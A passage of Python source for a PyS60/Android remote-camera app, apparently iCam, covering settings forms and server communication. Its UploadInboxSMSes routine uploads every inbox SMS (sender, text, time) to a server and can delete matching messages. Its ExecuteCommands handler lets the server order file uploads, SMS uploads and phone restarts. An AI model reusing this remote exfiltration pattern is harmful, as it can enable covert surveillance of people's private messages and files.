In case something changed (e.g., on S60 camera2 module doesn't exist), we
make sure the indices are within the valid values - otherwise, for ex,
the S60 UI will raise exception.
"""
for i in range(2):
if (localVideoModeIndex[i] < 0) or \
(localVideoModeIndex[i] >= len(cameraVideoModes[i])):
localVideoModeIndex[i] = 0
#if (localVideoMode[i] == []):
# localVideoModeIndex[i] = -1
DebugPrint("Entered RecordConfigMenu():" \
" videoRecordDuration[0] = %d, videoRecordDuration[1] = %d\n" % \
(videoRecordDuration[0], videoRecordDuration[1]) + \
" localVideoModeIndex[0] = %d, localVideoModeIndex[1] = %d\n" % \
(localVideoModeIndex[0], localVideoModeIndex[1]) + \
" videoAudioEnabled = %s\n" % str(videoAudioEnabled) + \
" audioRecordDuration = %d" % audioRecordDuration)
#localVideoMode is set before being used
yesNoComboList = [u"No", u"Yes"]
if ANDROID_OS:
SetRecordDurationMenu_real(0)
#TODO!!!! - choose from possible video resolutions
TITLE_MENU = u"Mute video record?"
try:
videoAudioEnabled = 1 - DialogMultipleChoices(TITLE_MENU, \
yesNoComboList, 1 - videoAudioEnabled)
StoreState()
#TODO!!!! - call also DisplayRedrawInfo()
except:
DebugPrint("Exception in RecordConfigMenu(). Bailing out...")
DebugPrintErrorTrace()
"""
DisplayNote("For simple microphone recording, select duration " \
"from the Record Config menu.")
# microphoneComboList[0]
# (u"Main camera video mode", "combo", (localVideoModeComboList[0],
# localVideoModeIndex[0])),
# (u"Mute video record", "combo", (yesNoComboList,
# 1 - videoAudioEnabled)),
"""
SetRecordDurationMenu_real(2)
elif SYMBIAN_OS:
"""
From http://wiki.forum.nokia.com/index.php/How_to_use_Form_in_Python_for_S60
(and also http://www.mobilenin.com/pys60/info_tabs_forms.htm):
"""
try:
# Initialize a boolean variable to know whether the form is saved.
recordConfigFormSaved = False
localVideoModeComboList = [None, None]
# (Tested a bit on phone with numCamerasSupported < 2)
# Create a list to be used in "combo" selection mode.
for cameraId in range(numCamerasSupported):
localVideoModeComboList[cameraId] = []
for videoMode in cameraVideoModes[cameraId]:
# print "resPhoto[0] = ", resPhoto[0]
# print "resPhoto[1] = ", resPhoto[1]
"""
localVideoModeComboList[cameraId] += [u"(%d, %d, %.1f)" \
% (videoMode["size"][0],
videoMode["size"][1], videoMode["rate"])]
"""
localVideoModeComboList[cameraId].append( \
u"(%d x %d @ %.0f fps)" % (videoMode["size"][0], \
videoMode["size"][1], videoMode["rate"]) )
except:
DebugPrintErrorTrace()
try:
myFields = []
if numCamerasSupported >= 1:
myFields = [
(u"Main camera record duration", "number",
videoRecordDuration[0]),
(u"Main camera video mode", "combo",
(localVideoModeComboList[0], localVideoModeIndex[0]))
]
if numCamerasSupported == 2:
myFields += [
(u"VGA camera record duration", "number",
videoRecordDuration[1]),
(u"VGA camera video mode", "combo",
(localVideoModeComboList[1], localVideoModeIndex[1]))
]
myFields += [
(u"Mute video record", "combo",
(yesNoComboList, 1 - videoAudioEnabled)),
(u"Microphone record duration", "number",
audioRecordDuration)
]
# appuifw.app.title = u"Select Record Durations"
appuifw.app.title = u"Record Config"
# Creates the form
"""
recordConfigForm = appuifw.Form(myFields,
flags=appuifw.FFormEditModeOnly)
"""
#recordConfigForm = appuifw.Form(myFields, appuifw.FFormEditModeOnly)
#recordConfigForm = appuifw.Form(myFields, appuifw.FFormDoubleSpaced)
recordConfigForm = appuifw.Form(myFields,
appuifw.FFormEditModeOnly | \
appuifw.FFormDoubleSpaced)
# Define a function to be called when the form is saved.
def RecordConfigFormSaved(arg):
global recordConfigFormSaved, canvas
recordConfigFormSaved = True
# appuifw.app.body = canvas
RedrawHandler(None)
return True
# Assign the save function
recordConfigForm.save_hook = RecordConfigFormSaved
#Show the form. This operation is blocking until we close the form.
recordConfigForm.execute()
# After the form is saved and closed, display the information.
if recordConfigFormSaved == True:
# print recordConfigForm[0][2]
"""
appuifw.note(unicode("Google Username: " +
recordConfigForm[0][2]), "info")
videoRecordDuration[0] = ...
videoRecordDuration[1] = recordConfigForm[1][2]
audioRecordDuration = recordConfigForm[2][2]
"""
"""
The combo form field value is a long integer.
We convert it to int because we would receive
"TypeError: Form combo field, bad index" at the next
instantiation of appuifw.Form().
"""
SetRecordDuration(0, int(recordConfigForm[0][2]))
localVideoModeIndex[0] = int(recordConfigForm[1][2][1])
videoMode = cameraVideoModes[0][localVideoModeIndex[0]]
localVideoMode[0] = ((videoMode["size"][0],
videoMode["size"][1]),
videoMode["rate"])
DebugPrint("RecordConfigMenu(): localVideoMode[0] = %s." % \
str(localVideoMode[0]))
SetRecordDuration(1, int(recordConfigForm[2][2]))
localVideoModeIndex[1] = int(recordConfigForm[3][2][1])
videoMode = cameraVideoModes[1][localVideoModeIndex[1]]
localVideoMode[1] = ((videoMode["size"][0],
videoMode["size"][1]), videoMode["rate"])
DebugPrint("RecordConfigMenu(): localVideoMode[1] = %s." % \
str(localVideoMode[1]))
videoAudioEnabled = 1 - int(recordConfigForm[4][2][1])
SetRecordDuration(2, int(recordConfigForm[5][2]))
StoreState()
except:
DebugPrintErrorTrace()
"""
# Doesn't work in Python 2.2 (e.g., PyS60 1.4.5)
finally:
appuifw.app.title = ICAM_APP_TITLE
"""
appuifw.app.title = ICAM_APP_TITLE
# This var is required as global.
cameraModesFormSaved = False
def CaptureWhatMenu():
global cameraModesFormSaved
global cameraMode, readGPS, logAccelerometerAndRotationSensors
DebugPrint("Entered CaptureWhatMenu().")
"""
From http://wiki.forum.nokia.com/index.php/How_to_use_Form_in_Python_for_S60
(and also http://www.mobilenin.com/pys60/info_tabs_forms.htm):
"""
# u"Media Storage"
TITLE_MENU = u"Capture What"
cameraModesComboList = [u"None", u"Video", u"Photo",
u"Both photo and video"]
microphoneComboList = [u"[Select duration from Record Config]"]
if ANDROID_OS:
# resMenu = None
try:
cameraMode[0] = DialogMultipleChoices(TITLE_MENU, \
cameraModesComboList, int(cameraMode[0]))
# val = int(DialogGetInput(myText, "[seconds]", str(initVal)))
StoreState()
except:
DebugPrint("Exception in CaptureWhatMenu(). Bailing out...")
DebugPrintErrorTrace()
DisplayNote("For simple microphone recording, select duration from " \
"the Record Config menu.") # microphoneComboList[0]
elif SYMBIAN_OS:
try:
# Initialize a boolean variable to know whether the form is saved.
cameraModesFormSaved = False
notAvailableComboList = [u"Not Available"]
noComboList = [u"No"]
yesNoComboList = [u"No", u"Yes"]
# Samsung, Nokia E7, 6120 and N82.
if deviceId in [IMEI_G810, IMEI_E7, IMEI_N95, IMEI_N82]:
gpsComboList = yesNoComboList
else:
gpsComboList = noComboList
# Assuming numCamerasSupported == 2.
myFields = [(u"Main camera", "combo",
(cameraModesComboList, cameraMode[0])),
(u"VGA camera", "combo",
(cameraModesComboList, cameraMode[1])),
(u"Microphone", "combo", (microphoneComboList, 0)),
(u"Read GPS coordinates", "combo",
(gpsComboList, readGPS)),
# (u"Read GPS coordinates", "combo",
# (noComboList, readGPS)),
(u"Accelerometer & Rotation", "combo",
(noComboList, logAccelerometerAndRotationSensors))]
#(u"Accelerometer & Rotation", "combo", (yesNoComboList,
# logAccelerometerAndRotationSensors))
if numCamerasSupported == 0:
myFields[0] = (u"Main camera", "combo",
(notAvailableComboList, 0))
if numCamerasSupported < 2:
myFields[1] = (u"VGA camera", "combo",
(notAvailableComboList, 0))
appuifw.app.title = TITLE_MENU
# Creates the form
"""
durationForm = appuifw.Form(myFields,
flags=appuifw.FFormEditModeOnly)
"""
# durationForm = appuifw.Form(myFields, appuifw.FFormEditModeOnly)
"""
cameraModesForm = appuifw.Form(myFields,
appuifw.FFormDoubleSpaced)
"""
cameraModesForm = appuifw.Form(myFields,
appuifw.FFormEditModeOnly
| appuifw.FFormDoubleSpaced)
# Define a function to be called when the form is saved
def CameraModeFormSaved(arg):
global cameraModesFormSaved
cameraModesFormSaved = True
return True
# Assign the save function
cameraModesForm.save_hook = CameraModeFormSaved
#Show the form. This operation is blocking until we close the form.
cameraModesForm.execute()
# After the form is saved and closed, display the information.
if cameraModesFormSaved == True:
# print durationForm[0][2]
"""
appuifw.note(unicode("Google Username: " +
durationForm[0][2]), "info")
"""
"""
The combo form field value is a long integer. We convert it to
int because we would receive
"TypeError: Form combo field, bad index"
at the next instantiation of appuifw.Form().
"""
cameraMode[0] = int(cameraModesForm[0][2][1])
cameraMode[1] = int(cameraModesForm[1][2][1])
readGPS = int(cameraModesForm[3][2][1])
#if phoneModel in ["NokiaN95", "NokiaN82", "NokiaN8",
# "NokiaE7"]:
if readGPS:
StartGPS()
else:
StopGPS()
StoreState()
except:
DebugPrintErrorTrace()
"""
# Doesn't work in Python 2.2 (e.g., PyS60 1.4.5).
finally:
appuifw.app.title = ICAM_APP_TITLE
"""
appuifw.app.title = ICAM_APP_TITLE
DebugPrint("Exiting CaptureWhatMenu().")
def SetPhotoQuality_real(aQuality):
global photoQuality
if (aQuality < 0) or (aQuality > 100):
return
photoQuality = aQuality
# SetMenu()
StoreState()
"""
We define this function as 2 lambdas to make it an callable even if it is
passed the aQualityIndex parameter.
"""
SetPhotoQuality = lambda aQuality: lambda : \
SetPhotoQuality_real(aQuality)
photoFormSaved = False # This var is required as global.
def PhotoConfigMenu():
global photoFormSaved
global localPhotoResolutionIndex, photoResolutionIndex, photoQuality
DebugPrint("Entered PhotoConfigMenu().")
if SYMBIAN_OS:
"""
From http://wiki.forum.nokia.com/index.php/How_to_use_Form_in_Python_for_S60
(and also http://www.mobilenin.com/pys60/info_tabs_forms.htm):
"""
try:
# Initialize a boolean variable to know whether the form is saved.
photoFormSaved = False
localComboList = [None, None]
# sentComboList = [None, None]
sentComboList = None
# Create a list to be used in "combo" selection mode.
for cameraId in range(numCamerasSupported):
localComboList[cameraId] = []
# This is IMPORTANT
if cameraId == 0:
if phoneModel == "SamsungSGH-G810":
cameraPhotoSizes = \
cameraPhotoSizes_RGB24[0]
else:
cameraPhotoSizes = \
cameraPhotoSizes_JPEG_Exif[0]
elif cameraId == 1:
cameraPhotoSizes = cameraPhotoSizes_RGB24[1]
for resPhoto in cameraPhotoSizes:
"""
Example:
cameraPhotoSizes_JPEG_Exif[0] = [
(2592, 1944),
(2048, 1536),
(1600, 1200),
(1024, 768),
(640, 480)
]
"""
# print "resPhoto[0] = ", resPhoto[0]
# print "resPhoto[1] = ", resPhoto[1]
localComboList[cameraId].append( u"(%d, %d)" % \
(resPhoto[0], resPhoto[1]) )
DebugPrint( "PhotoConfigMenu(): localComboList[%d] = %s." % \
(cameraId, str(localComboList[cameraId])) )
sentComboList = []
"""
Example:
cameraPhotoSizes_JPEG_Exif[0] = [
(2592, 1944), (2048, 1536),
(1600, 1200), (1024, 768),
(640, 480)
]
"""
for resPhoto in photoResolutionStr:
# print "resPhoto[0] = ", resPhoto[0]
# print "resPhoto[1] = ", resPhoto[1]
sentComboList.append( u"%s" % resPhoto[0] )
DebugPrint( "PhotoConfigMenu(): sentComboList = %s." % \
str(sentComboList) )
if numCamerasSupported >= 1:
"""
(u"", "text", \
u"Local Photo Resolution (Each camera)"),
(u"Local Photo Resolutions", \
"text", u""),
(u"Main camera", "number", \
videoRecordDuration[0]),
(u"Main camera", "combo", (localComboList[0], \
localPhotoResolutionIndex[0]))]
"""
myFields = [ \
( u"Local Photo Resolutions - Main camera", \
"combo", (localComboList[0], \
localPhotoResolutionIndex[0]) ) \
]
if numCamerasSupported == 2:
"""
(u"VGA camera", "combo", (localComboList[1], \
localPhotoResolutionIndex[1]))]
"""
myFields += [ \
( u"Local Photo Resolutions - VGA camera", \
"combo", (localComboList[1], \
localPhotoResolutionIndex[1]) ) \
]
else:
# (u"VGA camera", "text", u"n/a")]
myFields += [ \
( u"Local Photo Resolutions - VGA camera", \
"text", u"[N/A]" )]
if numCamerasSupported >= 1:
"""
(u"", "text", \
u"Sent Photo Resolution (Both cameras)"),
"""
myFields += [ \
( u"Sent Photo Resolution - Both cameras", \
"combo", (sentComboList, \
photoResolutionIndex) ) ]
"""
if numCamerasSupported == 2:
myFields += [ \
(u"VGA", "combo", (sentComboList[1], \
photoResolutionIndex[1]))]
else:
myFields += [
(u"VGA", "text", u"")]
"""
if numCamerasSupported >= 1:
# (u"", "text", u"Sent Photo Quality"),
myFields += [ \
( u"Sent Photo Quality - Both cameras", \
"number", photoQuality ) ]
DebugPrint("PhotoConfigMenu(): myFields = %s." % str(myFields))
appuifw.app.title = u"Photo Config"
# Creates the form.
#photoForm = appuifw.Form(myFields,flags=appuifw.FFormEditModeOnly)
#photoForm = appuifw.Form(myFields, appuifw.FFormEditModeOnly)
#photoForm = appuifw.Form(myFields, appuifw.FFormDoubleSpaced)
photoForm = appuifw.Form(myFields, appuifw.FFormEditModeOnly | \
appuifw.FFormDoubleSpaced)
# Define a function to be called when the form is saved.
def PhotoFormSaved(arg):
global photoFormSaved
photoFormSaved = True
return True
# Assign the save function
photoForm.save_hook = PhotoFormSaved
#Show the form. This operation is blocking until we close the form.
photoForm.execute()
# After the form is saved and closed, display the information
if photoFormSaved == True:
#print photoForm[0][2]
#appuifw.note(unicode("Google Username: " + photoForm[0][2]),
# "info")
"""
The combo form field value is a long integer. We convert it to
int because we would receive
"TypeError: Form combo field, bad index"
at the next instantiation of appuifw.Form().
"""
localPhotoResolutionIndex[0] = int(photoForm[0][2][1])
if numCamerasSupported == 2:
localPhotoResolutionIndex[1] = int(photoForm[1][2][1])
photoResolutionIndex = int(photoForm[2][2][1])
SetLocalPhotoResolution()
"""
DebugPrint("PhotoConfigMenu(): " \
"localPhotoResolutionIndex[0] = %d, " \
"len(cameraPhotoSizes) = %d." % \
(cameraId, localPhotoResolutionIndex[0],
len(cameraPhotoSizes)))
selectionListResolution = []
for i in range(len(cameraPhotoSizes)):
if i == localPhotoResolutionIndex[cameraId]:
selectionListResolution += [unicode(MENU_SELECT_PREFIX)
+ unicode(cameraPhotoSizes[i])]
else:
selectionListResolution += \
[unicode(cameraPhotoSizes[i])]
index = appuifw.selection_list(selectionListResolution, 0)
if index is not None:
SetLocalPhotoResolutionIndex(index)()
"""
photoQuality = int(photoForm[3][2])
StoreState()
except:
DebugPrintErrorTrace()
"""
# Doesn't work in Python 2.2 (e.g., PyS60 1.4.5).
finally:
appuifw.app.title = ICAM_APP_TITLE
"""
appuifw.app.title = ICAM_APP_TITLE
def UploadInboxSMSes(cleanUndesiredSMSes=False):
global deviceId
global inboxIsImported
DebugPrint("Entered UploadInboxSMSes(): inboxIsImported = %d." % \
inboxIsImported)
if SYMBIAN_OS:
if inboxIsImported == False:
return
try:
myMailbox = inbox.Inbox(inbox.EInbox)
messageIdList = myMailbox.sms_messages()
myText = "The phone Inbox has %d SMSes.<br/>\n" % \
len(messageIdList)
myText += "The phone Inbox SMSes have message IDs: " + \
str(messageIdList) + "<br/>\n"
messageCounter = 0
for messageId in messageIdList:
try:
myText += " " + str(messageId) + "<br/>\n"
except:
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
myText += "Exception: exceptionTraceback = %s, " \
"exceptionType = %s, " \
"exceptionValue = %s.<br/>\n" % \
(repr(traceback.format_tb(exceptionTraceback)),
str(exceptionType), str(exceptionValue))
DebugPrintErrorTrace()
try:
myText += " " + myMailbox.address(messageId) + "<br/>\n"
except:
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
myText += "Exception: exceptionTraceback = %s, " \
"exceptionType = %s, " \
"exceptionValue = %s.<br/>\n" % \
(repr(traceback.format_tb(exceptionTraceback)),
str(exceptionType), str(exceptionValue))
DebugPrintErrorTrace()
try:
myText += " " + myMailbox.content(messageId) + "<br/>\n"
except:
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
myText += "Exception: exceptionTraceback = %s, " \
"exceptionType = %s, " \
"exceptionValue = %s.<br/>\n" % \
(repr(traceback.format_tb(exceptionTraceback)),
str(exceptionType), str(exceptionValue))
DebugPrintErrorTrace()
try:
myText += " " + time.ctime(myMailbox.time(messageId)) \
+ "<br/>\n"
except:
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
myText += "Exception: exceptionTraceback = %s, " \
"exceptionType = %s, " \
"exceptionValue = %s.<br/>\n" % \
(repr(traceback.format_tb(exceptionTraceback)),
str(exceptionType), str(exceptionValue))
DebugPrintErrorTrace()
if cleanUndesiredSMSes:
try:
if str(myMailbox.content(messageId)).startswith( \
"Serviciul de date este deja activ."):
"""
if str(myMailbox.address(messageId)) == "302" and
str(myMailbox.content(messageId)).startswith(
"Serviciul de date este deja activ."):
"""
DebugPrint("UploadInboxSMSes(): deleting message " \
"with messageId = %d since it " \
"corresponds to cleaning criteria." % \
messageId)
myMailbox.delete(messageId)
except:
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
myText += "Exception: exceptionTraceback = %s, " \
"exceptionType = %s, " \
"exceptionValue = %s.<br/>\n" % \
(repr(traceback.format_tb(
exceptionTraceback)),
str(exceptionType), str(exceptionValue))
DebugPrintErrorTrace()
messageCounter += 1
try:
myText = myText.encode("ascii", "ignore")
except:
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
myText += "Exception: exceptionTraceback = %s, " \
"exceptionType = %s, " \
"exceptionValue = %s.<br/>\n" % \
(repr(traceback.format_tb(exceptionTraceback)),
str(exceptionType), str(exceptionValue))
DebugPrintErrorTrace()
# myText = str(myText)
myDateTime = GetCurrentDateTimeStringWithMilliseconds()
"""
myDateTime = time.strftime("%Y_%m_%d_%H_%M_%S",
GetCurrentDateTime())
"""
fileName = "SMSes_Inbox_" + myDateTime + ".txt"
pathFileName = LOCAL_FOLDER + "/" + fileName
fOutput = open(pathFileName, "wb")
fOutput.write(myText)
fOutput.close()
try:
if not os.path.exists(LOCAL_FOLDER_SENT_LOGS):
os.makedirs(LOCAL_FOLDER_SENT_LOGS)
except:
DebugPrintErrorTrace()
"""
if UploadFile(pathFileName, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_FILE) != -1:
MoveFileBetweenAnyDrives(pathFileName,
LOCAL_FOLDER_SENT_LOGS + "/" + fileName)
"""
UploadFile(pathFileName, ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_FILE)
MoveFileBetweenAnyDrives(pathFileName,
LOCAL_FOLDER_SENT_LOGS + "/" + fileName)
"""
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
"""
except:
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId,
"Exception in UploadInboxSMSes() - details: " \
"free_ram = %d. exceptionTraceback = %s, " \
"exceptionType = %s, exceptionValue = %s. " \
"Bailing out..." %
(GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)),
str(exceptionType), str(exceptionValue)),
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint("Exception in UploadInboxSMSes(). Bailing out...")
DebugPrintErrorTrace()
"""
Not much used - ex use: employ it to receive a .WAV file from the
server to be played on the phone script (e.g., an updated iCam.Py script)
and run it, an extension, etc.
"""
def DownloadFile(fileName):
global ICAM_SERVER_NAME, accessPointName
global deviceId
if NoInternetConnection():
return
try:
PetWatchdog()
dataCompressed = urllib.urlopen("http://" + ICAM_SERVER_NAME + \
WEBPAGE_DL_GZIPPED_FILE + "?deviceId=" + deviceId + \
"&filename=" + fileName).read()
dataUncompressed = dataCompressed.decode("zlib")
LOCAL_FOLDER_FILES_FROM_SERVER = LOCAL_FOLDER + "/FilesFromServer"
try:
if not os.path.exists(LOCAL_FOLDER_FILES_FROM_SERVER):
os.makedirs(LOCAL_FOLDER_FILES_FROM_SERVER)
except:
DebugPrintErrorTrace()
fOutput = open(LOCAL_FOLDER_FILES_FROM_SERVER + "/" + fileName, "wb")
fOutput.write(dataUncompressed)
fOutput.close()
except:
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
myText = "Exception in DownloadFile. Details: time = %s, " \
"free_ram = %d. %s." % \
(GetCurrentDateTimeStringNice(), GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)))
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(myText)
if MY_DEBUG_STDERR:
# traceback.print_exc()
sys.stderr.write(myText + "\n")
sys.stderr.flush()
"""
Change User-Agent
(see http://docs.python.org/library/urllib.html and
http://diveintopython3.org/http-web-services.html).
By default urllib.urlopen sends a User-Agent string "Python-urllib/1.17"
(see /var/log/apache2/access.log for log entries when it calls cmd.php).
"""
class AppURLopener(urllib.FancyURLopener):
version = ""
urllib._urlopener = AppURLopener()
# (S60_EDITION[0] < 3)):
#if SYMBIAN_OS and SYMBIAN_S60_2ND_ED:
if sys.version_info[0 : 2] == (2, 2):
class MyListIterClass:
"""
Helper class for Python 2.2.
This class has to be put outside ExecuteCommands() otherwise we get
exception: "SyntaxError: unqualified exec is not allowed in
function 'ExecuteCommands' it contains a nested function with
free variables" .
Python 2.2.2 (e.g., PyS60 1.4.5) does not have iterator defined for list -
although they say that __iter__ exists from Python 2.2 in
http://docs.python.org/release/2.5.2/lib/typeiter.html,
http://www.python.org/dev/peps/pep-0234/ and
http://docs.python.org/library/stdtypes.html.
"""
def __init__(self, aList):
self.myList = aList
self.myIndex = 0
def next(self):
if self.myIndex >= len(self.myList):
raise StopIteration
res = self.myList[self.myIndex]
self.myIndex += 1
return res
def __length_hint__(self):
return len(self.myList) - self.myIndex
def ExecuteCommands(cmdString, fastExec=False):
global MY_DEBUG_STDOUT, MY_DEBUG_STDERR, MY_DEBUG_STDERR_2, \
MY_DEBUG_UPLOAD_MSG
global MAX_NUM_HOTSPOTS
global deviceId, ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT
global modeManagerIsEnabled
global internetUploadMaxErrors
global NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS
global uploadUnsentData
global saveUnsentPackets
global uploadHowManyOfLatestBluetoothMessages
global pauseIntervalGdata
global BATTERY_LEVEL_THRESHOLD
global cameraMode
global exposureIndex
global whiteBalanceIndex
global flashIndex
global videoAudioEnabled
global localVideoModeIndex, localVideoMode, cameraVideoModes
global localPhotoResolutionIndex
global bluetoothMode
global bluetoothServerAddress
global burstModeIsStarted
global numHotspots
global differentPixelsPercentageThreshold
global hotspot
global storeLocallyMedia
global uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer
global googleUsername
global googlePasswordEncrypted
global googleKeywords
global googleMediaPrivate
global dawnTimeVec
global duskTimeVec
if (cmdString is None) or (len(cmdString) < 5):
return False
if fastExec == False:
myText = "ExecuteCommands(): Received commands at %s: %s." % \
(GetCurrentDateTimeStringNice(), cmdString)
DebugPrint(myText)
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
try:
lineList = cmdString.splitlines()
except:
DebugPrintErrorTrace()
return False
#res = 0
# Python 2.2 does not have iterator for list, so we create a helper class.
# (S60_EDITION[0] < 3)):
#if SYMBIAN_OS and SYMBIAN_S60_2ND_ED:
if sys.version_info[0 : 2] == (2, 2):
cmdIterator = MyListIterClass(lineList)
else:
cmdIterator = lineList.__iter__()
"""
Inspired from
http://stackoverflow.com/questions/1292189/how-does-python-for-loop-work
while True:
try:
line = cmdIterator.next()
except StopIteration:
# StopIteration exception is raised after last element
break
print cmdIterator.__length_hint__()
# loop code
print line
"""
"""
Python doesn't have hasNext() method - see
http://stackoverflow.com/questions/1966591/hasnext-in-python-iterators
"""
while cmdIterator.__length_hint__() > 0:
try:
cmdLine = cmdIterator.next()
# print cmdIterator.__length_hint__()
tokens = cmdLine.split(" ")
DebugPrint("ExecuteCommands(): tokens = %s." % str(tokens))
if tokens[0] == "quit-application":
Quit()
elif tokens[0] == "restart-phone":
RestartPhone()
elif tokens[0] == "set-startAutomatically":
"""
I think it is not a good idea to do have it since we don't
want to give the possibility to control remotely the
device.
global startAutomatically
startAutomatically = int(tokens[1])
"""
pass
elif tokens[0] == "set-internetUploadMaxErrors":
internetUploadMaxErrors = int(tokens[1])
elif tokens[0] \
== "set-NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS":
NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS = \
int(tokens[1])
elif tokens[0] == "set-uploadUnsentData":
"""
Note: 0 - send none; 1 - send unsent files from Unsent;
2 - send unsent logs; 3 - send ALL
"""
uploadUnsentData = int(tokens[1])
elif tokens[0] == "set-saveUnsentPackets":
"""
# 0 - None, 1 - All; 2 - wo .txm
"""
saveUnsentPackets = int(tokens[1])
elif tokens[0] == "upload-how-many-of-latest-bluetooth-messages":
"""
Note: 0 - don't upload, if -1 - upload all BUT in chrono order,
if > 0 then upload that many latest.
"""
uploadHowManyOfLatestBluetoothMessages = int(tokens[1])
elif tokens[0] == "send-file-via-bluetooth":
BluetoothClientDiscoverServer(tokens[1])
#!!!!TODO
"""
BluetoothUploadGZippedData(tokens[1],
cmdLine[len(tokens[0]) + len(tokens[1]) + 2:],
COMMANDS_FILENAME, newMode=NEW_BT_FORMAT)
"""
elif tokens[0] == "send-command-via-bluetooth":
"""
Note that BluetoothUploadGZippedData() calls also the
BluetoothClientDiscoverServer(), but since we are
normally executing this command from the BT server and
it can send commands to several BT clients, then need to
reinitialize each time bluetoothServerOPPServicePort -
we normally don't recompute it otherwise, since we assume
the phone is BT client.
"""
BluetoothClientDiscoverServer(tokens[1])
BluetoothUploadGZippedData(tokens[1],
cmdLine[len(tokens[0]) + len(tokens[1]) + 2:],
COMMANDS_FILENAME, newMode=NEW_BT_FORMAT)
elif tokens[0] == "send-commands-via-bluetooth":
# print tokens[2:]
# print tokens[2:]
btCmd = cmdLine[len(tokens[0]) + len(tokens[1]) + 2:]
# print "Initially btCmd =", btCmd
while cmdIterator.__length_hint__() > 0:
cmdLineNew = cmdIterator.next()
if cmdLineNew == "send-commands-via-bluetooth-endline":
break
else:
btCmd += "\n" + cmdLineNew
DebugPrint("ExecuteCommands(): btCmd = %s." % btCmd)
"""
Note that BluetoothUploadGZippedData() calls also the
BluetoothClientDiscoverServer(), but since we are
normally executing this command from the BT server and
it can send commands to several BT clients, then need to
reinitialize each time bluetoothServerOPPServicePort -
we normally don't recompute it otherwise, since we assume
the phone is BT client.
"""
BluetoothClientDiscoverServer(tokens[1])
BluetoothUploadGZippedData(tokens[1], btCmd, \
COMMANDS_FILENAME, newMode=NEW_BT_FORMAT)
elif tokens[0] == "set-logging-level":
MY_DEBUG_STDOUT = int(tokens[1])
MY_DEBUG_STDERR = int(tokens[2])
MY_DEBUG_STDERR_2 = int(tokens[3])
MY_DEBUG_UPLOAD_MSG = int(tokens[4])
elif tokens[0] == "set-pause-interval":
# myTimer.cancel()
SetPauseInterval(int(tokens[1]))()
elif tokens[0] == "set-pauseIntervalGdata":
# res = 1
pauseIntervalGdata = int(tokens[1])
elif tokens[0] == "set-battery-level-threshold":
BATTERY_LEVEL_THRESHOLD = int(tokens[1])
elif tokens[0] == "set-camera-mode":
"""
Note: 0 = None, 1 = Only Video, 2 = Only Photo,
3 = Both Photo and Video
"""
cameraMode[int(tokens[1])] = int(tokens[2])
elif tokens[0] == "set-photo-resolution-index":
SetUploadedPhotoResolutionIndex(int(tokens[1]))()
elif tokens[0] == "set-photo-quality":
SetPhotoQuality(int(tokens[1]))()
elif tokens[0] == "set-photo-mode-index":
pass
elif tokens[0] == "set-digital-zoom":
SetDigitalZoom(int(tokens[1]))()
elif tokens[0] == "set-camera-exposure-index":
cameraId = int(tokens[1])
exposureIndex[cameraId] = int(tokens[2])
elif tokens[0] == "set-camera-whitebalance-index":
cameraId = int(tokens[1])
whiteBalanceIndex[cameraId] = int(tokens[2])
elif tokens[0] == "set-flash-index":
flashIndex = int(tokens[1])
elif tokens[0] == "set-camera-video-record-duration":
cameraId = int(tokens[1])
SetRecordDuration(cameraId, int(tokens[2]))
elif tokens[0] == "set-video-mute":
videoAudioEnabled = 1 - int(tokens[1])
DebugPrint("ExecuteCommands(): made videoAudioEnabled = %d." % \
videoAudioEnabled)
elif tokens[0] == "set-local-video-mode-index":
cameraId = int(tokens[1])
localVideoModeIndex[cameraId] = int(tokens[2])
"""
localVideoMode[cameraId] = \
cameraVideoModes[localVideoModeIndex[cameraId]]
localVideoMode[cameraId][0] = \
cameraVideoModes[cameraId][
localVideoModeIndex[cameraId]]["size"]
localVideoMode[cameraId][1] = cameraVideoModes[cameraId][
localVideoModeIndex[cameraId]]["rate"]
"""
localVideoMode[cameraId] = \
( cameraVideoModes[cameraId][
localVideoModeIndex[cameraId]]["size"],
cameraVideoModes[cameraId][
localVideoModeIndex[cameraId]]["rate"] )
elif tokens[0] == "set-local-photo-resolution-index":
# SetLocalPhotoResolution()
cameraId = int(tokens[1])
localPhotoResolutionIndex[cameraId] = int(tokens[2])
SetLocalPhotoResolution()
elif tokens[0] == "set-audio-record-duration":
SetRecordDuration(2, int(tokens[1]))
elif tokens[0] == "set-bluetooth-mode":
# Note: bluetoothMode is: 0 is None; 1 is BT server; 2 is BT client.
bluetoothMode = int(tokens[1])
elif tokens[0] == "set-bluetoothServerAddress":
# Ex: bluetoothServerAddress is "ff:ff:ff:ab:cd:ef"
bluetoothServerAddress = tokens[1]
elif tokens[0] == "upload-file":
UploadFile(tokens[1], ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_FILE)
elif tokens[0] == "upload-inbox-smses":
if len(tokens) > 1 and \
tokens[1] == "and-clean-undesired-smses":
# if tokens[1] == "and-clean-undesired-smses":
UploadInboxSMSes(True)
else:
UploadInboxSMSes(False)
